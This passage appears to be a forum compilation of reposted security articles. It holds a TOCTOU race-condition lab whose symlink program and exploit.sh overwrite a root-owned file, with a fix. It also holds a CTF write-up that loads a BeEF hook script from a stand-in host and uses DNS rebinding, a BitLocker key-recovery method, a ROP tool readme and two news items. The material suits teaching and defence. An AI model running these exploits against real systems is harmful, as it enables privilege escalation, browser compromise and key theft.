vulnerable-program.c –o vulnerable-program Now the code should be compiled correctly, and the owner of the binary file should be the root user as you see from the below screenshot. Set the Set-UID Bit to the Binary File In this step, the student should set the Set-UID bit to the binary file, by following the following steps: Open the terminal Change the user to the root user Use the “chmod” command line utility to set the SUID bit #chmod u+s vulnerable-program As you can see from the below screenshot that the vulnerable program binary file became part of Set-UID program Exploiting the Vulnerable Program The idea of exploiting the vulnerability is that there is a possibility that the file used by “access()” system call is different from the file used by calling “fopen()” system call even though they have the same file name. This could happen if a malicious attacker can create a symbolic link with the same name as the provided filename (provided by the user as a command line argument). The symbolic link is pointing to the protected file which usually we don’t have permission to edit it such as “/etc/shadow” file, so the attacker can cause the user input to be appended to the protected file “/etc/shadow” because the program runs with the root privilege, and can overwrite any file. For successfully exploit this vulnerable program, we need to achieve the following: Overwrite any file that belongs to root user which usually we don’t have permission to overwrite it. To achieve this you should follow the following steps: Create a File Belongs to the Root User In this step, you should create a file belongs to the root user; you should follow the following steps to create a file belongs to the root user: Open the terminal Change the user to login as the root user Now type the following command to create a file called passwd and put some text in it. # echo “This is a file owned by the user” > passwd Now use the following command to make sure that the file is created and it’s owner is the root user “ls –l passwd”. Write a Symbolic Link Program In this step, you should write a program that will create the symbolic link to the protected file rather than creating it manually, You can manually create symbolic links using “ln -s” or you can call C function “symlink” to create symbolic links in your program. The following program will create a symbolic link with the same name as the provided filename (provided by the user as a command line argument) /* symbolic-link.c */ #include <stdio.h> #include<unistd.h> #include <string.h> int main(int argc, char * argv[]) { unlink(argv[1]); symlink(“./passwd”,argv[1]); } So now follow the following steps to compile it correctly: Copy the code in a file and name it as “symbolic-link.c” Open a terminal (Normal user) Use Clang compiler to compile the code. $clang symbolic-link.c –o symbolic-link Now the code should be compiled correctly, and the binary is ready to use it. Write a Script to Exploit the Vulnerable Program In this step, you should write a script to execute the vulnerable program and the symlink program at the same time and check if the protected file has been overwritten, if not the script should repeat the attack until it works. The following bash script will do the following: Create a file; the normal user can overwrite it. Run the vulnerable program and the symbolic link program at the same time Then the script checks if the password file has been changed or not. If changed, it will stop the execution. 4. If not changed it will repeat the steps again until the attack succeeds. #!/bin/sh # exploit.sh old=`ls -l passwd` new=`ls -l passwd` while [ “$old” = “$new” ] do rm passwdlocal; echo “This is a file that the user can overwrite” > passwdlocal echo “TOCTOU-Attack-Success” | ./vulnerable-program passwdlocal & ./symbolic-link passwdlocal & new=`ls -l passwd` done echo “STOP… The passwd file has been changed” Now copy the previous bash script as “exploit.sh” and execute it as the following “./exploit.sh” (Normal user) and the script will not stop executing until the attack succeed and the password file will be overwritten. As you can see from the above screenshot that the attack executed multiple times and finally the attack succeeds and the password file has been overwritten. P.S.: The attack takes some time to succeed (It takes 2 min with me), if you want to make faster, you could increase the delay time between “access()” and “open()” system calls. ETHICAL HACKING TRAINING – RESOURCES (INFOSEC) Mitigation The best approach to fix the vulnerable program in this lab is to apply the least privilege principle, in other words, if the users who use the program don’t need a certain privilege, it should be disabled. In our case, we can use “seteuid()” system call to temporarily disable the root privilege, and we can enable it later if necessary. Here is the updated vulnerable code with the fix to mitigate this vulnerability, we fixed this vulnerable program by setting the effective user id to the real user id value, so if the real user doesn’t have the permission to overwrite the file, then the file will not be overwritten. /* vulnerable-program-fix.c */ #include <stdio.h> #include<unistd.h> #include <sys/types.h> #include <string.h> #define DELAY 50000 int main(int argc, char * argv[]) { char * fileName = argv[1]; char buffer[60]; int i; FILE * fileHandler; /* get user input */ scanf(“%50s”, buffer ); if(!access(fileName, W_OK)) { /*Simulating the Delay*/ for(i = 0; i < DELAY;i++) { int a = i ^ 2; } /*THIS IS THE FIX */ /*Set the effective user id to the real user id value.*/seteuid(getuid()); fileHandler = fopen(fileName, “a+”); fwrite(“\n”, sizeof(char), 1, fileHandler); fwrite(buffer, sizeof(char), strlen(buffer), fileHandler);fwrite(“\n”, sizeof(char), 1, fileHandler); fclose(fileHandler); } else { printf(“No permission \n”); } } After compiling the previous code and setting the Set-UID bit, it’s time to run the exploit code again. You will observe that the exploit code will run almost forever, and the attack will not succeed any more. AUTHOR Ahmed Mohamed Sursa: http://resources.infosecinstitute.com/race-condition-toctou-vulnerability-lab/

0CTF 2016 Write Up: Monkey (Web 4) The Chinese 0CTF took place on March 12-13 and it was yet another fun CTF. I played with my teammates from TheGoonies and we were ranked #48. I found the Web task "Monkey" particularly interesting: I solved it with the help from my friend@danilonc, but it took way longer than it should because of some **Spoiler Alert** DNS glitches. According to the scoreboard status, approximately 35 teams were able to solve it. Task: Monkey (Web - 4pts) What is Same Origin Policy? you can test this problem on your local machine http://202.120.7.200 The running application receives a Proof-of-Work string and an arbitrary URL, instructing a "monkey" to browse the inputted URL for 2 minutes. Proof-of-Work Solving the proof-of-work is pretty straightforward. We had to generate random strings and compare the first 6 chars from its MD5 against the challenge. The POW challenge was more cpu-intensive than normal, so the traditional bash/python one-liner ctf scripts would require some performance improvements. @danilonc had written a quick hack using Go to bruteforce and solve POW from older CTF challs, so we just slightly modified it: package main import ( "fmt" "os" "crypto/md5" "math/rand" "time" "encoding/hex" "strings" ) var letters = []rune("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789=/+") func randSeq(n int) string { b := make([]rune, n) for i := range b { b = letters[rand.Intn(len(letters))] } return string(b) } func main() { //warning - don't try this at home //OWASP kills a panda every time you seed random with timepstamps rand.Seed(time.Now().UnixNano()) //argument from cmdline prefix := os.Args[1] //generate md5 from random strings for { attemp := randSeq(8) hash := md5.New() hash.Write([]byte(attemp)) hashString := hex.EncodeToString(hash.Sum(nil)) //compare the cmdline input with the md5 prefix if strings.HasPrefix(hashString,prefix){ fmt.Printf("%s\n",attemp) break } } } view rawpow.go hosted with ❤ by GitHub Solving the Proof-of-Work: Same-Origin-Policy and CORS The Same-Origin-Policy (SOP) deems pages having the same URI scheme, hostname and port as residing at the same-origin. If any of these three attributes varies, the resource is in a different origin. Hence, if provided resources come from the same hostname, scheme and port, they can interact without restriction. If you try to use an XMLHttpRequest to send a request to a different origin, you can’t read the response. However, the request will still arrive at its destination. This policy prevents a malicious script on one page from obtaining access to sensitive data (both the header and the body) on another web page, on a different origin. For this particular CTF challenge, if the secret internal webpage had had an insecure CORS header like this "Access-Control-Allow-Origin: *", we would be able to retrieve its data with no effort. This, of course, was not the case. Bypassing the Same-Origin The flag was accessible on an internal webserver hosted at http://127.0.0.1:8080/secret. The first thing we did was hooking the monkey's browser using BeEF, so we could fingerprint his device, platform, plugins and components. There was nothing interesting here, a custom user-agent and no known vulnerable component. We enumerated the chars accepted by the server with the following script: #!/bin/bash for (( j=0 ; j<=0xFF ; j++ )) ; do i=$(printf '%%%X\n' $j) echo -n "$i"" " page=$(curl -s -D - http://202.120.7.200) session=$(echo "$page" | grep Cookie | cut -d" " -f2 | cut -d";" -f1) challenge=$(echo $page | grep substr | cut -d\' -f2) string=$(go run pow.go "$challenge") curl -i -s -k -X 'POST' \ -b "$session" \ --data-binary $"task="$string"&url="$i"" \ 'http://202.120.7.200/run.php' | tail -n1 echo done view rawtest-chars.sh hosted with ❤ by GitHub Unfortunately, the server was rejecting special chars like spaces (%20 and +) and there was no command injection signal. Our evil plan to input --disable-web-security $URL to disable Chrome's SOP didn't work so we had to find new ways to retrieve the secrets. We also thought about using data:uri and file schemes to load a malicious script/webpage, but it wouldn't help us to bypass the SOP. We tried to input URL's like <html><script/**/src='http://www.example.com:8000/hook.js'></script></html> andfile:///proc/self/environ (setting custom headers with a malicious HTML), but that is also known not to work on modern browsers. DNS Rebinding After some discussion, we came to the conclusion that we needed to perform a DNS Rebinding attack.devttys0 presented about this class of vulnerabilities at DEFCON 18 and @mikispag recently wrote a detailed post describing how to use DNS rebinding to steal WiFi passwords. DNS rebinding is a technique that can be used to perform a breach of same-origin restrictions, enabling a malicious website to interact with a different domain. The possibility of this attack arises because the segregations in the SOP are based primarily on domain name and port, whereas the ultimate delivery of HTTP requests involves converting domain names into IP addresses. We had some issues at first because we tried to use the free DNS service from DuckDNS and it was very glitchy. For some obscure reason, we were unable to hook the user's browser when using the service. In order to make our life miserable, the challenge monkey would browse the site for two minutes only: we also could't use the DNS services from Namecheap because the minimum TTL time is 60 seconds. Attack Phase After deciding to set up the DNS server on our own, we came with the following attack scenario: 1) User visits the beef hook page at http://ctf.example.com:8080 (IP 1.2.3.4). 2) Webpage will load BeEF javascript hook and his browser will become a zombie. 3) We perform a DNS Rebind to change the A Record from 1.2.3.4 to 127.0.0.1. @danilonc set the BIND Zone file with a low TTL (1 sec) and replaced the answer (lines 14-15) as soon as the browser got hooked. 4) Perform a CORS request using BeeF's "Test CORS Request" module. Here's a small diagram of the attack: After a couple of tries we finally managed to get the flag: Flag: 0ctf{monkey_likes_banananananananaaaa} Posted by Bernardo Rodrigues at 9:01 PM Sursa: https://w00tsec.blogspot.ro/2016/03/0ctf-2016-write-up-monkey-web-4.html

RECOVERING BITLOCKER KEYS ON WINDOWS 8.1 AND 10 A brief touch on how the changes to BitLocker after Windows 7 affect master key recovery and where to look when recovering keys. This article is not intended to be an in-depth look at the inner workings of BitLocker, but is instead focussed on retrieval of the Full Volume Encryption Key (FVEK) from memory. Key recovery on Windows 7 is a fairly simple exercise (see references at the end of this article for further reading). When dealing with a Windows 7 memory image we can simply search for theFVEc pool tag as an indicator of exactly where the FVEK lies in memory. From there, we can proceed to extract the key. Starting with Windows 8, however, it seems that the cryptographic operations for BitLocker have been outsourced to Microsoft’s CNG (Cryptography Next Generation) Module, which is the long-term replacement for CryptoAPI, rather than being performed internally within the fvevol driver. What this means for us is that searching for the FVEc pool tag on Windows 8 and above will no longer yield anything useful. AESKeyFind still works, of course, though depending on your memory image you may need to tweak your threshold settings. Key Recovery via Live kernel debugging I’m not entirely sure where you would find yourself in a situation with a debugger attached to the kernel, yet not be able to disable BitLocker, retrieve the recovery password or add your own key protector, but hey, stranger things have happened. On the other hand, perhaps you want the FVEK for other reasons – such as persistence across key protector changes (Even then retrieval from memory is arguably less effort and less intrusive than kernel debugging). However I used windbg to investigate the changes to BitLocker on Windows 8 / 10 and it is certainly possible to retrieve the FVEK using this method as well as demonstrating the use of CNG. To get started, this is an example of the call stack on a Windows 7 box – The encrypt / decrypt functions are all handled within fvevol. This example is using the default encryption method, which is AES 128-bit with the Elephant Diffuser. On the other hand, in this Windows 8.1 example, CNG starts to get involved with the encrypt / decrypt functions: Now, we can actually retrieve the FVEK at this point from the second argument passed toSymCryptEcbDecrypt, which contains a pointer to the location of the key in memory. Therdx register (64-bit machine) contains a pointer to the location of the FVEK in memory, so, by setting a breakpoint on cng!SymCryptEcbDecrypt then obtaining the value of rdx we can extract the FVEK (Note that this is a 256-bit key, the default 128-bit will be half the size): That was a Windows 8.1 Example. When dealing with Windows 10 in XTS-AES mode, break on cng!SymCryptXtsAesDecrypt and check the rcx register (During my testing the key was passed as the first argument to the XTS Decrypt function): By moving backwards through the memory image slightly we can see that this section of memory is likely tagged with a Cngb pool tag. As expected, checking the pool tag definitions reveals that Cngb is used for CNG allocations: Cngb – ksecdd.sys – CNG kmode crypto pool tag Which brings us to the next (much more practical) stage. Key Recovery using memory pool allocations As previously mentioned most of the cryptographic work appears to have been farmed out to the CNG driver, whereas in previous versions of windows the fvevol driver contained its own implementations. Searching for the Cngb pool tag will yield a lot of results as CNG is a complex beast and is not solely used for BitLocker, however, the pool sizes seem to be fairly consistent which means we can use them as an indicator of key locations. The pool size for Cngb appears to be consistent at 672, regardless of encryption type – Volatility can find these pools for you with the poolpeek plugin: Whilst I have not yet identified a method of differentiating between BitLocker modes from the contents of the Cngb pool alone, there is a marker which appears to reliably identify a key length of either 128-bit or 256-bit at an offset of 0x68 within the pool. A value of ’10’ seems to indicate a key length of 128-bit to follow, and ’20’ indicates a key length of 256-bit. Interestingly enough, keys other than the FVEK exist with the same format (In a Cngb pool of size 672), but only after Bitlocker is enabled on the system. It’s possible this could be one of the other keys used in Bitlocker, such as the Volume Master Key (VMK), however at this point I have not identified the function of these keys. Volatility Plugin This plugin is very much an experimental work-in-progress. With this information on hand, I have put together a Volatility plugin which can extract BitLocker keys from Windows 7, and in theory versions of Windows above 7. The plugin isn’t entirely reliable for Windows 8 – 10 but works in most cases with a few quirks: Returns AES Keys other than the FVEK (See above, these keys only exist on Bitlocker protected systems). Doesn’t always work with Windows 10 XTS-AES encryption (Though works with CBC). Cannot identify the BitLocker mode of operation above Windows 7. The plugin operates as follows: Obtains Windows version from profile metadata. If the version is lower than Windows 8: Searches for FVEc pool tag Identifies BitLocker mode Extracts FVEK of appropriate length and TWEAK key if applicable If the version is higher than Windows 8: Searches for Cngb pool tag with a pool size of 672 Attempts to identify key length (Does not work properly for XTS-AES in Win10) Extracts either 128-bit or 256-bit key Is unable to guarantee it is a BitLocker FVEK. Prints the results. Example of a Windows 7 image: Example of a Windows 8.1 Image: Example of a Windows 10 image (CBC): And this is a screenshot of mounting the above Windows 8.1 protected volume using the FVEK data: The excellent libbde library can be used to mount BitLocker protected volumes in Linux using the FVEK and TWEAK data. I make no promises that the plugin is complete and works perfectly, but will hopefully at least be a starting point for further development of a complete BitLocker plugin. Plugin is on GitHub here: https://github.com/tribalchicken/volatility-bitlocker As usual feedback, corrections, criticism (preferably constructive) or further discussion are all welcome. Feel free to contact me. References and Further Reading Practical Cryptographic Key Recovery – Jesse Kornblum Implementing Bitlocker Drive Encryption for Forensic Analysis – Jesse Kornblum libyal / libbde Cryptography API: Next Generation – Microsoft Sursa: https://tribalchicken.com.au/technical/recovering-bitlocker-keys-on-windows-8-1-and-10/

ARM Roper Tool for searching the rop gadgets for ARM. Basically, refactorisation of the MyROP project, with further plans for features like converting to python string, blah blah. Installation For deps just run: sudo pip install -r requirements.txt Also you will need a capstone libs installed. After that you can try roper with: ./armroper.py -h Usage spx@galactica ~/c/armroper> ./armroper.py -h usage: armroper.py [-h] [-f FILENAME] [-d DEPTH] [-m] optional arguments: -h, --help show this help message and exit -f FILENAME, --filename FILENAME -d DEPTH, --depth DEPTH -m, --mode Contributing Fork it! Create your feature branch: git checkout -b my-new-feature Commit your changes: git commit -am 'Add some feature' Push to the branch: git push origin my-new-feature Submit a pull request Credits All the credits goes to the https://github.com/hitmoon/MyRop, and Jonathan Salwan from the shell-storm.org License Check the LICENCE file. Sursa: https://github.com/0xspx/armroper

Prolific Hacker Unmasks Himself ByPYMNTS Posted on March 14, 2016 According to reports by The Next Web, a leader of one of the world’s most notorious hacking teams has elected to unmask himself. The hacking team in question is GhostShell, a collective that, in recent history, has gone after the FBI, NASA and the Pentagon. And that’s just in the U.S. It has also made server attacks on Russian intelligence. That was 2012. Then, nothing for three years, just quiet, until 2015, when they came back, packing some punch. “This time, a much darker, seedier version emerged, hell-bent on destroying anything in its path and leaking information through its ‘dark hacktivism’ campaign for seemingly no other reason than to prove it could,” according to TNW. And then, using a generic email account, someone identifying himself as “White Fox” approached TNW — the name being important because it was also the moniker of a 2012 hacking operation pulled off by GhostShell. As it turns out, the hacker, who identifies himself as G. Razvan Eugen, has started an email list for journalists so that he can tell his story. The text of that letter is copied below. So, is Eugen for real? As verification, he provided a login to the Twitter account that GhostShell uses to disseminate information. He also offered photos, email accounts and even the private Twitter account he had been using to communicate for several years. All in, most tech journalists believe that while there are not locks in this business, this is as close as one could hope for. So, why come clean? According to correspondence between Eugen and TNW: “I just want to own up to my actions, face them head on and hope for the best. What I really want is to continue being part of this industry. Cybersecurity is something that I enjoy to the fullest, even with all the drama that it brings and legal troubles.” “In return, I hope other hackers and hacktivists take inspiration from this example and try to better themselves. Just because you’ve explored parts of the Internet and protested about things that were important to you, doesn’t mean you should be afraid and constantly paranoid of the people around you.” Sursa: http://www.pymnts.com/news/security-and-risk/2016/prolific-hacker-unmasks-himself/

Date Sun, 13 Mar 2016 21:53:34 -0700 Subject Linux 4.5 From Linus Torvalds <> share 0 share 37 So this is later on a Sunday than my usual schedule, because I just couldn't make up my mind whether I should do another rc8 or not, and kept just waffling about it. In the end, I obviously decided not to, but it could have gone either way. We did have one nasty regression that got fixed yesterday, and the networking pull early in the week was larger than I would have wished for. But the block layer should be all good now, and David went through all his networking commits an extra time just to make me feel comfy about it, so in the end I didn't see any point to making the release cycle any longer than usual. And on the whole, everything here is pretty small. The diffstat looks a bit larger for an xfs fix, because that fix has three cleanup refactoring patches that precedes it. And there's a access type pattern fix in the sound layer that generated lots of noise, but is all very simple in the end. In addition to the above, there's random small fixes all over - shortlog appended for people who want to skim the details as usual. Go test, and obviously with 4.5 released, I'll start the merge window for 4.6. Linus Sursa: https://lkml.org/lkml/2016/3/14/50